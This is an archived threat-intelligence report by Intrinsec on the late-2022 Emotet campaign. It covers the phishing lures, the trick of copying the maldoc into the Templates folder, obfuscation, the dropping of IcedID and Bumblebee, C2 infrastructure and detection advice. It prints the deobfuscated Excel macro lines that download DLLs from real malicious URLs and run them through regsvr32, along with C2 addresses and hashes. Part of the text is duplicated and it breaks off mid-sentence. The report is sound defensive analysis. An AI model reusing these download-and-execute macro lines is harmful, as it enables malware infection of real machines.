{ "id": "8417325f-65a9-490b-bf66-b97904fb404e", "created_at": "2026-04-06T00:14:37.344947Z", "updated_at": "2026-04-10T13:12:48.108731Z", "deleted_at": null, "sha1_hash": "4e8c55fd789a464429527d10f07ce9ba0b291aa9", "title": "Emotet returns and deploys loaders", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 199357, "plain_text": "Emotet returns and deploys loaders\r\nBy Intrinsec\r\nPublished: 2023-01-09 · Archived: 2026-04-05 20:33:47 UTC\r\n[et_pb_section fb_built=”1″ _builder_version=”4.18.0″ _module_preset=”default” global_colors_info=”{}”][et_pb_row\r\n_builder_version=”4.19.4″ _module_preset=”default” global_colors_info=”{}”][et_pb_column type=”4_4″\r\n_builder_version=”4.18.0″ _module_preset=”default” global_colors_info=”{}”][et_pb_text _builder_version=”4.19.4″\r\n_module_preset=”default” global_colors_info=”{}”]\r\nFirst identified in 2014 (as the Geodo banking Trojan) and considered by the U.S. Department of Homeland Security (DHS)\r\nto be one of the “most costly and destructive malwares” in the world, Emotet appears to be back after four months of\r\ninactivity.\r\n[/et_pb_text][et_pb_text _builder_version=”4.19.4″ _module_preset=”default” text_orientation=”justified”\r\nglobal_colors_info=”{}”]\r\nIndeed, the spam campaigns had come to an abrupt halt on July 13th, 2022, after being responsible for the compromise of\r\nmore than one million computers worldwide. However, the lull seems to have come to an end as cybersecurity researcher\r\nTommy Madjar (@ffforward being a member of Cryptolamus) has identified a return of Emotet-related operations as of\r\nNovember 2nd, 2022, in the morning. Contacted by BleepingComputer, the CTI researcher at Proofpoint added that phishing\r\ncampaigns spreading Emotet were back with the same email thread hijack technique to lure users and spread maldocs.\r\nIntrinsec was able to independently confirm the resurgence of Emotet from its probes.\r\nAs a reminder, Emotet was originally designed as a banking Trojan before evolving into a modular Trojan, being the fourth\r\niteration of the Geodo malicious code. Since 2017, however, Emotet is no longer used as a Trojan but as a loader-as-a-service (LaaS) for the purpose of distributing malicious code within the information systems (IS) it infects. According to\r\nTrend Micro, Emotet’s business is tied to Russian-speaking actors and likely resides somewhere in the UTC +10 time zone\r\nor further east based on C\u0026C delivery activities. Since then, along with peaks of activity, Emotet has become an important\r\ninitial access broker that enables top-tier ransomware gangs.\r\nIn the recent past, Emotet was known to install the TrickBot malware or more recently Cobalt Strike. The Emotet malware\r\nwas also known to be used by Conti operators as well as BlackCat and Quantum operators after Conti operations “ended” in\r\nJune 2022. Otherwise, Microsoft reported recently that developers of Emotet (but also of IcedId and Qakbot) have been\r\nrecruited by DEV-0193 cluster (Trickbot).\r\nAs far as the new Emotet distribution campaign is concerned, it appears to have relatively little new features at the time of\r\nwriting, keeping a relatively similar distribution pattern to previous ones observed by leveraging EtterSilent maldoc builder.\r\nIn France, stolen emails linked to notary offices have been observed in this new campaign, while similar emails appeared in\r\na previous campaign in October 2020.\r\nOf note though, is the new social engineering technique introduced by a new Excel attachment containing instructions to\r\nbypass Microsoft’s “Mark-of-the-Web” (MoTW) detection process. This Excel file would contain instructions to coerce the\r\nuser to copy the maldoc to a trusted folder named “Templates”, allowing it to bypass Microsoft’s Protected View. Once the\r\nfile is moved and opened in this folder, it immediately executes the macros that triggers the loading of the Emotet malware.\r\nWe also explain in the main text that since its return, Emotet has been seen dropping IcedID and Bumblebee malwares. We\r\nanticipate that further variants and techniques will surface in the future with such volumes of spam seeking to deploy ‘in\r\nfine’ ransomwares. As far as other types of threats are concerned, a recent report from Proofpoint showed that Emotet is\r\ndelivering a new module that executes XMRig (the most common Monero miner).\r\nThe present report also provides several tips to analyze the whole attack chain leveraged by Emotet as well as some\r\nrecommendations to defend against it.\r\n[/et_pb_text][et_pb_text _builder_version=”4.18.0″ _module_preset=”default” custom_padding=”0px|||||”\r\nglobal_colors_info=”{}”]\r\nIntrinsec CTI services\r\n[/et_pb_text][et_pb_text _builder_version=”4.19.4″ _module_preset=”default” text_orientation=”justified”\r\ncustom_padding=”||0px|||” global_colors_info=”{}”]\r\nOrganizations are facing a rise in the sophistication of threat actors and intrusion sets used by malicious actors.\r\nEmotet, described as “one of the world’s most destructive malwares” by the U.S. Department of Homeland Security, is\r\nregularly seen in new attack campaigns, overcoming security tools developed by editors.\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 1 of 24\n\nTo address these evolving threats, it is now necessary (but not sufficient) to take a proactive approach to the detection and\r\nanalysis of any element deemed malicious, in order to allow companies to anticipate, or at least react as quickly as possible,\r\nto the attempted compromises they face.\r\nFor this report, shared with our clients in November 2022, Intrinsec relied on its Cyber Threat Intelligence service, which\r\nprovides its customers with high value-added, contextualized and actionable content to understand and contain cyber threats.\r\nTo go further, Intrinsec offers you, through its “Risk Anticipation” module, dedicated and actionable intelligence to feed\r\nyour security tools. For more information, go to htbqccsz.elementor.cloud/veille-cybersecurite/\r\n[/et_pb_text][et_pb_text _builder_version=”4.19.4″ _module_preset=”default” global_colors_info=”{}”]\r\nEmotet’s aliases\r\n[/et_pb_text][et_pb_text _builder_version=”4.19.4″ _module_preset=”default” text_orientation=”justified”\r\nglobal_colors_info=”{}”]\r\nEmotet malware is also encountered in literature as:\r\nHeodo (being the 4th malicious iteration of Geodo)\r\nSpmTools by AdvIntel\r\nThe source code of Emotet and its infrastructure is allegedly operated by an intrusion set dubbed:\r\nTA542 by Proofpoint\r\nMummy Spider by Crowdstrike\r\nGoldCrestwood by Secureworks\r\nMealybug by Symantec\r\n[/et_pb_text][et_pb_text _builder_version=”4.19.4″ _module_preset=”default” global_colors_info=”{}”]\r\nRecent Emotet delivery tactics, techniques, and procedures\r\n[/et_pb_text][et_pb_text content_tablet=”\r\nOur analysis starts with the first stage of the attack chain that uses a phishing email, more specifically a spear phishing\r\nattachment technique %91T1566.001%93. For this, we found and analyzed an email sent by Emotet upon a recent spam\r\ncampaign that contains a malicious document (maldoc) attached to the email (see an example in Figure 1).\r\n%22%22\r\nFigure 1 An example of emails which may lead to Emotet malware infection. As extensively seen in the past TTPs of Emotet,\r\nthe latter fakes replies based on legitimate emails stolen from mail clients of Windows hosts previously infected. The Eml file\r\nof sha256: 910731579a78d2da6452bede7dfce8e1f89c285c22d8a7d40db2eafc2fcc45af was retrieved from VirusTotal.\r\nOnce the lured user opens the XLS file, a message box informs them that the document needs to be copied in a specific\r\ndirectory path to display the contents of the file (see Figure 2).\r\nEmotet spreaders are now using a new social engineering technique to coerce the user to copy the Excel file into the\r\nMicrosoft Office Templates folder before relaunching it. This is achieved via a fake yellow graphical ribbon pretending to be\r\nan official Microsoft warning. Because the Templates folder is considered a trusted location according to Microsoft Office\r\npolicy, the malicious macro will run immediately without a security warning (see recommendation to preempt the\r\nthreat at this stage). If you don’t copy the file anywhere, it will still execute the macros as soon as you press Enable\r\nContent in the yellow security warning from Excel (not the fake one in the spreadsheet).\r\n%22%22\r\nFigure 2 Message box displayed when opening the malicious document. As shown above, Microsoft informs the user with\r\nthe functionality known as Mark of the web (MoTW) forcing Emotet spreaders to adapt. The latter therefore added a specific\r\nmessage to the file, mimicking the Excel security warning (the yellow horizontal bar above the content) and indicating that,\r\nto run the file, it must be placed in the whitelisted Office Templates folder.\r\nIt is striking that Emotet so far has not migrated away from Office macros to other delivery mechanisms like ISO and LNK\r\nfiles. Indeed, many malware families quickly adopted this workaround following Microsoft’s recent announcement that it\r\nwould begin disabling macros by default in Office documents downloaded from the internet.\r\nAt the bottom of the document is usually seen one or several sheets (up to six) with apparent blank cells being password\r\nprotected as depicted in the Figure 3. We expect that this technique could slightly change in the future to evade heuristic\r\nsignatures.\r\n%22%22\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 2 of 24\n\nFigure 3 Excel maldoc with sheet protection added. If only one sheet is apparent in some encountered files, hidden sheets\r\ncan be revealed with a right click option to pursue the analysis.\r\nThe Emotet spreaders relied on a sheet protection measure for the sheets so that the user cannot view the included macro\r\nformula. However, the password protection of Office can be broken via a well-known brute force technique in a reasonable\r\namount of time or via a specific patching procedure. We retrieved the password using the first technique to reveal the cell\r\ncontents and the macro content.\r\nThe password to unprotect the sheets and reveal its content is: AABABAAABBB^\r\nAnother trick to avoid analysis was to scatter and blank data in cells. by changing the color as shown in the Figure 4 so the\r\nXLM macro is not directly readable.\r\n%22%22\r\nFigure 4 Malicious macro was scattered across the maldoc and hidden thanks to a white font color. Characters can be\r\nunveiled by changing the color of the cells.\r\nUsing Olevba, a free python tool, it is possible to find the cell containing the general formula concatenating the whole\r\ncommand executed upon the excel file opening (see the output result below in the textbox).\r\nSHEET: Sheet6, Macrosheet\r\nCELL:G13, =\r\n(((((((FORMULA(((((((((((((‘Sheet1′!L24\u0026’Sheet1′!L26)\u0026’Sheet1′!L27)\u0026’Sheet1′!L28)\u0026’Sheet1′!L28)\u0026’Sheet2′!F6)\u0026’Sheet2′!N19)\u0026’Sheet1′!F10\r\n0\r\nAnother trick to slow down the analysis was to shrink the column G in sheet 6 as shown in Figure 5.\r\n%22%22\r\nIn the present case, a field called “Auto_Open07457358934307593258350725798323209” was also observed. This latter\r\nautomatically triggers the aforementioned formula visible in G13 cell when the workbook is opened (see this ref for details\r\non this old technique).\r\nFigure 5 shows 4 pairs of commands containing de-obfuscated hardcoded URLs which will serve for the second stage of the\r\nattack:\r\n=CALL(%22urlmon%22,%22URLDownloadToFileA%22,%22JJCCBB%22,0,%22https%91:%93//cs.com.sg/Backup/Bk778kXNKMiH5vH/%22\r\n=EXEC(%22C:WindowsSystem32regsvr32.exe /S ..oxnv1.ooccxx%22)\r\n=CALL(%22urlmon%22,%22URLDownloadToFileA%22,%22JJCCBB%22,0,%22https%91:%93//j2ccamionmagasin.fr/css/1Mp8y/%22,%22..ox\r\n=EXEC(%22C:WindowsSystem32regsvr32.exe /S ..oxnv2.ooccxx%22)\r\n=CALL(%22urlmon%22,%22URLDownloadToFileA%22,%22JJCCBB%22,0,%22http%91:%93//atici.net/old/PkZI74DD/%22,%22..oxnv3.ooccx\r\n=EXEC(%22C:WindowsSystem32regsvr32.exe /S ..oxnv3.ooccxx%22)\r\n=CALL(%22urlmon%22,%22URLDownloadToFileA%22,%22JJCCBB%22,0,%22http%91:%93//clanbaker.org/css/khhl7kT2n69n/%22,%22..ox\r\n=EXEC(%22C:WindowsSystem32regsvr32.exe /S ..oxnv4.ooccxx%22)\r\nIn the present case, a CALL function is used to download and save files to the disk, via the function URLDownloadToFileA,\r\nfrom URLs. It is followed by an EXEC function to execute each downloaded file via the living off the land binary (LOLBin)\r\nregsvr32.exe.\r\nFour DLLs were then downloaded from those URLs. Three of these DLLs were copied in %UserProfile%AppDataLocal\r\nwith random names in a dedicated folder also having a random name, probably to bypass detection:\r\nC:UsersadminAppDataLocalClVoCQrGkecuASUzF.dll\r\nC:UsersadminAppDataLocalWLifsjKOOFEUaGZqSKWcHGU.dll\r\nC:UsersadminAppDataLocalWBoDkXTZxEMvgSGkaWpRogE.dll\r\nThe LOLBin regsvr32.exe is then used to execute those 4 downloaded DLLs:\r\n%22%22\r\nFigure 6 The LOLBin regsvr32.exe is used to execute the previously downloaded DLLs.\r\nregsvr32.exe will then communicate with a Korean IP address (182.162.143.56):\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 3 of 24\n\n%22%22\r\nFigure 7 Networks communications showing direct requests to one of Emotet’s C2.\r\nThis IP address belongs to the list of C2s extracted from the present sample.\r\nAs far as the persistence mechanism is concerned, the access is maintained on the system by adding multiple keys to the\r\nWindows registry, which will execute the DLL at every restart with regsvr32.exe:\r\n%22%22\r\nFigure 8 Location path of the DLLs are saved in the Windows registry for persistence purposes.\r\nEach key will start regsvr32.exe at the system’s startup to execute the DLLs:\r\n%22%22\r\nFigure 9 Commands that will launch the dll at the start of the computer.\r\nAll described techniques (hidden sheets, password protection, white background and characters) and observed attack chain\r\nsuggest that this campaign could be attributed to Emotet’s epoch5 botnet, which leverages the SilentBuilder dropper.\r\nEtterSilent Maldoc builder distribution\r\nAfter having analysed several samples, we concluded from observed commonalities within the maldocs’s metadata (see in\r\nthe Actionable content section) that EtterSilent maldoc builder was leveraged for Emotet’s distribution.\r\nEttersilent was created by a threat actor known as AshkERE on Russian speaking underground cybercriminal forums\r\n(Exploit and XSS). This threat actor appears as the sole seller and developer of EtterSilent (even though a teamwork remains\r\npossible). As a reminder, EtterSilent is a malicious document generator with embedded evasion defence techniques offering\r\ntwo types of weaponized Microsoft Office documents (maldocs). The most popular version seems the one leveraging\r\nmacros, which is serving many other threats such as Gozi, IcedID, Trickbot, BazarLoader and Qbot.\r\nEtterSilent came into favour with the cybercriminal community in 2021. Although its first mention dates to 2020, the term\r\nwas really popularized on Exploit and XSS during the spring of 2021. EtterSilent was already considered at that time as a\r\nvery efficient maldoc builder with low detection rates from security tools.\r\n%22%22\r\nFigure 10 AshkERE detailing his social network contacts in order to avoid impersonation, while confirming his presence on\r\nXSS.\r\nThe economic model seems/seemed to be constituted around a subscription offer, which can be purchased by members\r\n(seems to only be possible for five people simultaneously). The threat actor also sold the ‘EtterSilent Encrypt Edition’\r\nbuilder so intrusion sets could operate the tool themselves, offering an unlimited use of the tool for an initial price of 3000\r\ndollars, lowered to 2500 dollars at the end of the operations (on November 30, 2021).\r\nAshkERE is still present today with a similar username on Exploit and XSS and remains an active user even after having\r\nclosed the EtterSilent sales thread. He no longer appears to be publicly selling EtterSilent, but possibly privately.\r\n“Links with other malwares?”\r\nIt is worth noting that a similar Excel document analyzed in this report and used to spread Emotet was also observed to\r\ndeliver additional malwares such as Bumblebee and IcedID, two major players in the current threat landscape.\r\nWhile analyzing the network traffic of such payload upon dynamic malware analysis, a communicating IP address drew our\r\nattention. We indeed noticed the previously seen Emotet C2 (182.162.143%91.%9356) as shown in Figure 11:\r\n%22%22\r\nFigure 11 Excel document with a sha256: 199a2e0e1bb46a5dd8eb3a58aa55de157f6005c65b70245e71cecec4905cc2c0\r\ncommunicating to Emotet’s C2.\r\nBumblebee infection started with a downloaded PowerShell script (‘tps1.ps1’) used to download an additional dll (‘bb.dll’)\r\nassociated with the malware:\r\n%22%22\r\nFigure 12 GET requesting the ps1 file that will later download the bumblebee dll.\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 4 of 24\n\nThe extracted config from this Bumblebee dll reveals the following information about the malware:\r\nBotnet ID: 0311t2\r\nList of C2:\r\n39.65.8%91.%93170:443\r\n103.144.139%91.%93156:443\r\n107.189.30%91.%93231:443\r\n91.245.254%91.%93101:443\r\n194.135.33%91.%93127:443\r\nBumblebee’s configuration is contained inside the .data section of the binary amongst the RC4 encrypted strings. The RC4\r\ndecryption key is hard coded in this section in plain text.\r\nWe then observe that once Bumblebee is executed, the infected machine communicates with a C2\r\n(103.144.139%91.%93156) that was discovered in the extracted list from the configuration.\r\n%22%22\r\nFigure 13 Network traffic showing a connection to one of Bumblebee’s C2s.\r\nWe can also observe connections to an IP address (87.251.67%91.%93168) associated with the IcedID malware:\r\n%22%22\r\nFigure 14 Network traffic showing a connection to one of IcedID’s C2.\r\nThis address resolves the domain spkdeutshnewsupp%91.%93com (see Figure 15) from which we could pivot and gather\r\nadditional hashes of IcedID samples (Figure 16).\r\n%22%22\r\nFigure 15 Packet containing the domain name.\r\n%22%22\r\nFigure 16 Detection rate (6/95) of this IP address on VirusTotal Intelligence. Several malicious payloads associated with\r\nIcedID communicate with this domain.\r\nFrom a pivot on VirusTotal intelligence we could gather additional IcedID samples hashes that communicate with this\r\ndomain:\r\n05a3a84096bcdc2a5cf87d07ede96aff7fd5037679f9585fee9a227c0d9cbf51\r\n4e79b28215998b57d79a5272e9114eff8fc6ea3c7aac626110d18087c7d1a12b\r\n748c98bd8fe9eaf024481251faa10a0abc631b0fb03758271526d813b57b2567\r\n923715af8f2e49242e18210c143ffd69300cdf675f61ae33c2f2fcbab6df07e2\r\nc58b13dc51e572ec288d97aa255d55884d7418466b8381afd1a4278a0be87427\r\nd3d0e3512bf398aa0699fe1a57cd769fd0ef1801c110aea63c469f7632f36d50\r\nAs far as other types of threats are concerned, a recent report from Proofpoint showed that Emotet is delivering a new\r\nmodule that executes XMRig (the most common Monero miner). Consequently, detecting Emotet often means that the\r\nattack is more thorough than expected and conversely the detection of coinminers/loaders shall not be overlooked.\r\nCode Analysis of a recent Emotet sample\r\nTo better understand Emotet’s recent evolutions and new features, we proceeded to a code analysis of a recent sample of this\r\nmalware Hash of the analyzed sample (sha256:\r\n06b3d3c50da5054b9e37fb6c429c560484be457a09a900b21b5185cf10128ed4). First, we carried on a static analysis of such\r\na sample. The high entropy of the .text section of the binary, as depicted in Figure 17, suggests that this malware is probably\r\npacked. This is also suggested by the presence of randomized unreadable strings in the sample.\r\n%22%22\r\nFigure 17 High entropy of the text section of the binary suggests that it is probably packed as viewed in Detect-it-easy open-source tool.\r\nAt this stage of the analysis, the sample was loaded into the debugger x64dbg to unpack Emotet. For that purpose, a\r\nbreakpoint was set on calls to some Windows APIs such as %22VirtualAlloc%22 (allocating memory). Once this breakpoint\r\nis reached, it is possible to observe in the return of the VirtualAlloc function that the malware allocates memory space and\r\nwrote a binary (MZ) in the RAX register.\r\n%22%22\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 5 of 24\n\nFigure 18 Memory dump of the RAX register containing the malicious Emotet PE file. Hash of the file (sha256):\r\n04c40a669fcfcd20bd429cbe4f78c71e8403ca70f804262a24024cb40dba321b\r\nOnce the binary is unpacked, we obtain the final Emotet payload which is a 64bit dll.\r\n%22%22\r\nFigure 19 Repeated mathematical operations used for obfuscation.\r\n%22%22\r\nFigure 20: Another example of those operations.\r\nAt first glance, the static analysis of the dll seems particularly difficult because of the heavy code obfuscation used. Simple\r\nexpressions were transformed into mathematical operations repeated multiple times. Sometimes the results of these\r\noperations are passed in a function that will never be used in the program.\r\nIP addresses and ports of the C2 servers are obfuscated in functions, each of those functions corresponding to one specific\r\nC2. As we can see, instead of having those constants in the code, Emotet’s developers are using a series of logical operations\r\nto build them. However, it is easy to bypass this obfuscation technique since the display of those constants has been\r\nautomatically simplified in pseudocode. Therefore, the effort of the developers of Emotet to hinder analysis of the malware’s\r\ncode appears completely moot.\r\n%22%22\r\nFigure 21 Disassembly view (left) and pseudocode view (right) of a function returning the C2 IP and port.\r\nThis function is referenced in a list of several other functions also containing the IP addresses and ports of other C2.\r\n%22%22\r\nFigure 22 Pointers to every function containing C2 information. It is possible to find in this list the function previously\r\nanalyzed.\r\nSince Emotet chose obfuscation over encryption to hide its C2 configuration, we could simply emulate those functions, or\r\neven run them in a debugger to retrieve IP/port information in plain text.\r\nAs far as Emotet 64-bit emulation is concerned, we used “Dumpulator” to emulate the function returning the C2’s\r\ninformation.\r\n%22%22\r\nFigure 23 Emulation result for the given function returns in this example an IP address: 159.65.88%91.%9310 and a Port:\r\n8080\r\nA further innovation of recent Emotet samples lies in the way it encrypts its network communications. Previously, Emotet\r\nwas used to hide its C2 HTTP network traffic via an AES symmetric key encrypted by a hard-coded RSA public key.\r\nEmotet now uses Elliptic Curve Diffie Hellman (EDCH) public key. Furthermore, Emotet uses a hard-coded Elliptic\r\nCurve Digital Signature Algorithm (ECDSA) public key for data validation. From the studied unpacked sample, we could\r\nretrieve the following information:\r\nECDH:\r\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuwTyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuq\r\nECDSA:\r\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9XoovpqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSP\r\nInfrastructure\r\nAfter having extracted the configuration of different samples (see previous section), we managed to retrieve several IP\r\naddresses of command-and-control servers with which the payloads communicate. The configurations vary according to the\r\nsamples and allow us to identify which payload is part of Epoch4 or Epoch5 according to its encryption key.\r\nWe cross-referenced these addresses with the command-and-control servers referenced on Feodo Tracker. Some were still\r\nactive while others had been disconnected after being publicly reported. The configurations contained IP addresses\r\nassociated with specific ports (TCP ports like 80 (http) or 443 (https), or on different ports (8080, 7080, …)).\r\nAfter a careful analysis of which service listing on such ports communicate with the payloads, we systematically found a\r\nnginx proxy server. This was deduced from the response headers returned from a simple get request method to fetch data.\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 6 of 24\n\nWhile trying to find a differentiating element on these servers, we noticed a certain similarity: most of those servers exposed\r\nlegitimate web services next to the service used for command \u0026 control on a different port. These commonalities are\r\nsummarized in two Maltego graphs depicted in Figure 23 and Figure 24.\r\n%22%22\r\nFigure 24 Maltego graph of Emotet’s epoch 4 C2 proxies with legitimate services impacted by vulnerabilities.\r\n%22%22\r\nFigure 25 Maltego graph of Emotet’s epoch 5 C2 proxies with legitimate services and vulnerabilities.\r\nIn addition to exposing legitimate web services, all these servers have numerous vulnerabilities according to Shodan. We\r\nconcluded, with a moderate level of confidence, that these servers have limited security and may have been compromised.\r\nConclusion\r\nThe present report provides a straight-forward and up-to-date analysis of the ongoing Emotet campaign, presently\r\ndistributing hundreds of thousands of emails per day. This investigation highlights notable changes in the modus operandi of\r\nEmotet’s operators (TA545), such as new ways to social engineer its victims to execute malicious documents used to deploy\r\nEmotet. Beyond these new methods leveraged by Emotet for initial access, the present report suggests that the change in the\r\nobfuscation technique of the main payload does not hinder an easy extraction of the configuration of the malware. This\r\nshows that Emotet’s developers may not understand how modern decompilers actually work. We also showed that since its\r\nreturn, Emotet has been seen dropping IcedID and Bumblebee malwares via Epoch 4 botnets. We anticipate that further\r\nvariants and techniques will surface in the future with fewer or greater volumes of spam.\r\nThe present report also provides several tips to analyze the whole attack chain leveraged by Emotet as well as some\r\nrecommendations to defend against it.\r\nActionable content\r\nAs we have seen in the main text, Emotet spreaders were forced to adapt and now try to lure users by attempting them to\r\ncopy the maldoc into a whitelisted directory path on the disk. We recommend monitoring any execution of XLS files arising\r\nfrom those directories. It is also recommended to make employees aware of this new technique via sensibilization training\r\nsessions and simulated phishing attacks.\r\nEmotet is known to be highly polymorphic (i.e., the ability of code to change its identifiable features while maintaining its\r\nfunctionality) and tends to embed more and more threatening modules. Emotet often repacks its dropper and changes its\r\nmodules loaded to stay ahead of signature-based detection solution. Although its functionalities might not vary that much,\r\nthese changes are enough to bypass pattern-matching and footprint detection. More subtle detection (EDR, behavioral\r\nanalysis) would be required to detect the initial infection.\r\nWe draw your attention to one checker and complementary tools:\r\nA relevant free tool to defend against Emotet, which is dubbed EmoCheck, was released a while ago by the JPCERT\r\n(available here on their Github repository). This checker might be relevant particularly for forensics teams when they\r\ninvestigate workstations or servers that might have been infected by Emotet.\r\nEmocheck-ReportChecker can also be helpful as it generates statistics out of numerous Emocheck reports\r\nAnother relevant tool named EmoKill. This program was inspired from the detection rules of Emocheck and was\r\ncompiled and shared on Github.\r\nTo draft this report, Intrinsec studied commonalities of XLS maldocs sent to Emotet’s victims as spearphishing attachments.\r\nOne common metadata that could be leveraged on VirusTotal Intel for hunting purposes goes as follow:\r\nmagic:%22CDF V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, *Author: Gydar,\r\nLast Saved By: Gydar*, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jun 04\r\n18:19:34 2015, Security: 0%22\r\nThe code page identifier 1251 refers to Windows Cyrillic-Slavic encoding, mostly used by Russians, Bulgarians, Serbians\r\nand Macedonians. It is also worth noting that all results of the aforementioned query on VT have the same filesize of 255 kB\r\nSeveral SIGMA detection rules could be leveraged to detect an attack by Emotet malware:\r\nDetects network connections and DNS queries initiated by Regsvr32.exe\r\nDetects various anomalies in relation to regsvr32.exe\r\nDetects New Lolbin Process by Office Applications\r\nA YARA detection rule provided by The DFIR Report\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 7 of 24\n\nTo detect all threats mentioned in this report (Emotet, IcedID, BumbleBee), defenders can also rely on relevant Abuse threat\r\nintel sources such as Feodotracker, ThreatFox and MalwareBazaar as well as the soon available Intrinsec’s IoCs feed.\r\n” content_phone=”\r\nOur analysis starts with the first stage of the attack chain that uses a phishing email, more specifically a spear phishing\r\nattachment technique %91T1566.001%93. For this, we found and analyzed an email sent by Emotet upon a recent spam\r\ncampaign that contains a malicious document (maldoc) attached to the email (see an example in Figure 1).\r\n%22%22\r\nFigure 1 An example of emails which may lead to Emotet malware infection. As extensively seen in the past TTPs of Emotet,\r\nthe latter fakes replies based on legitimate emails stolen from mail clients of Windows hosts previously infected. The Eml file\r\nof sha256: 910731579a78d2da6452bede7dfce8e1f89c285c22d8a7d40db2eafc2fcc45af was retrieved from VirusTotal.\r\nOnce the lured user opens the XLS file, a message box informs them that the document needs to be copied in a specific\r\ndirectory path to display the contents of the file (see Figure 2).\r\nEmotet spreaders are now using a new social engineering technique to coerce the user to copy the Excel file into the\r\nMicrosoft Office Templates folder before relaunching it. This is achieved via a fake yellow graphical ribbon pretending to be\r\nan official Microsoft warning. Because the Templates folder is considered a trusted location according to Microsoft Office\r\npolicy, the malicious macro will run immediately without a security warning (see recommendation to preempt the\r\nthreat at this stage). If you don’t copy the file anywhere, it will still execute the macros as soon as you press Enable\r\nContent in the yellow security warning from Excel (not the fake one in the spreadsheet).\r\n%22%22\r\nFigure 2 Message box displayed when opening the malicious document. As shown above, Microsoft informs the user with\r\nthe functionality known as Mark of the web (MoTW) forcing Emotet spreaders to adapt. The latter therefore added a specific\r\nmessage to the file, mimicking the Excel security warning (the yellow horizontal bar above the content) and indicating that,\r\nto run the file, it must be placed in the whitelisted Office Templates folder.\r\nIt is striking that Emotet so far has not migrated away from Office macros to other delivery mechanisms like ISO and LNK\r\nfiles. Indeed, many malware families quickly adopted this workaround following Microsoft’s recent announcement that it\r\nwould begin disabling macros by default in Office documents downloaded from the internet.\r\nAt the bottom of the document is usually seen one or several sheets (up to six) with apparent blank cells being password\r\nprotected as depicted in the Figure 3. We expect that this technique could slightly change in the future to evade heuristic\r\nsignatures.\r\n%22%22\r\nFigure 3 Excel maldoc with sheet protection added. If only one sheet is apparent in some encountered files, hidden sheets\r\ncan be revealed with a right click option to pursue the analysis.\r\nThe Emotet spreaders relied on a sheet protection measure for the sheets so that the user cannot view the included macro\r\nformula. However, the password protection of Office can be broken via a well-known brute force technique in a reasonable\r\namount of time or via a specific patching procedure. We retrieved the password using the first technique to reveal the cell\r\ncontents and the macro content.\r\nThe password to unprotect the sheets and reveal its content is: AABABAAABBB^\r\nAnother trick to avoid analysis was to scatter and blank data in cells. by changing the color as shown in the Figure 4 so the\r\nXLM macro is not directly readable.\r\n%22%22\r\nFigure 4 Malicious macro was scattered across the maldoc and hidden thanks to a white font color. Characters can be\r\nunveiled by changing the color of the cells.\r\nUsing Olevba, a free python tool, it is possible to find the cell containing the general formula concatenating the whole\r\ncommand executed upon the excel file opening (see the output result below in the textbox).\r\nSHEET: Sheet6, Macrosheet\r\nCELL:G13, =\r\n(((((((FORMULA(((((((((((((‘Sheet1′!L24\u0026’Sheet1′!L26)\u0026’Sheet1′!L27)\u0026’Sheet1′!L28)\u0026’Sheet1′!L28)\u0026’Sheet2′!F6)\u0026’Sheet2′!N19)\u0026’Sheet1′!F10\r\n0\r\nAnother trick to slow down the analysis was to shrink the column G in sheet 6 as shown in Figure 5.\r\n%22%22\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 8 of 24\n\nIn the present case, a field called “Auto_Open07457358934307593258350725798323209” was also observed. This latter\r\nautomatically triggers the aforementioned formula visible in G13 cell when the workbook is opened (see this\r\nFigure 5 shows 4 pairs of commands containing de-obfuscated hardcoded URLs which will serve for the second stage of the\r\nattack:\r\n=CALL(%22urlmon%22,%22URLDownloadToFileA%22,%22JJCCBB%22,0,%22https%91:%93//cs.com.sg/Backup/Bk778kXNKMiH5vH/%22\r\n=EXEC(%22C:WindowsSystem32regsvr32.exe /S ..oxnv1.ooccxx%22)\r\n=CALL(%22urlmon%22,%22URLDownloadToFileA%22,%22JJCCBB%22,0,%22https%91:%93//j2ccamionmagasin.fr/css/1Mp8y/%22,%22..ox\r\n=EXEC(%22C:WindowsSystem32regsvr32.exe /S ..oxnv2.ooccxx%22)\r\n=CALL(%22urlmon%22,%22URLDownloadToFileA%22,%22JJCCBB%22,0,%22http%91:%93//atici.net/old/PkZI74DD/%22,%22..oxnv3.ooccx\r\n=EXEC(%22C:WindowsSystem32regsvr32.exe /S ..oxnv3.ooccxx%22)\r\n=CALL(%22urlmon%22,%22URLDownloadToFileA%22,%22JJCCBB%22,0,%22http%91:%93//clanbaker.org/css/khhl7kT2n69n/%22,%22..ox\r\n=EXEC(%22C:WindowsSystem32regsvr32.exe /S ..oxnv4.ooccxx%22)\r\nIn the present case, a CALL function is used to download and save files to the disk, via the function URLDownloadToFileA,\r\nfrom URLs. It is followed by an EXEC function to execute each downloaded file via the living off the land binary (LOLBin)\r\nregsvr32.exe.\r\nFour DLLs were then downloaded from those URLs. Three of these DLLs were copied in %UserProfile%AppDataLocal\r\nwith random names in a dedicated folder also having a random name, probably to bypass detection:\r\nC:UsersadminAppDataLocalClVoCQrGkecuASUzF.dll\r\nC:UsersadminAppDataLocalWLifsjKOOFEUaGZqSKWcHGU.dll\r\nC:UsersadminAppDataLocalWBoDkXTZxEMvgSGkaWpRogE.dll\r\nThe LOLBin regsvr32.exe is then used to execute those 4 downloaded DLLs:\r\n%22%22\r\nFigure 6 The LOLBin regsvr32.exe is used to execute the previously downloaded DLLs.\r\nregsvr32.exe will then communicate with a Korean IP address (182.162.143.56):\r\n%22%22\r\nFigure 7 Networks communications showing direct requests 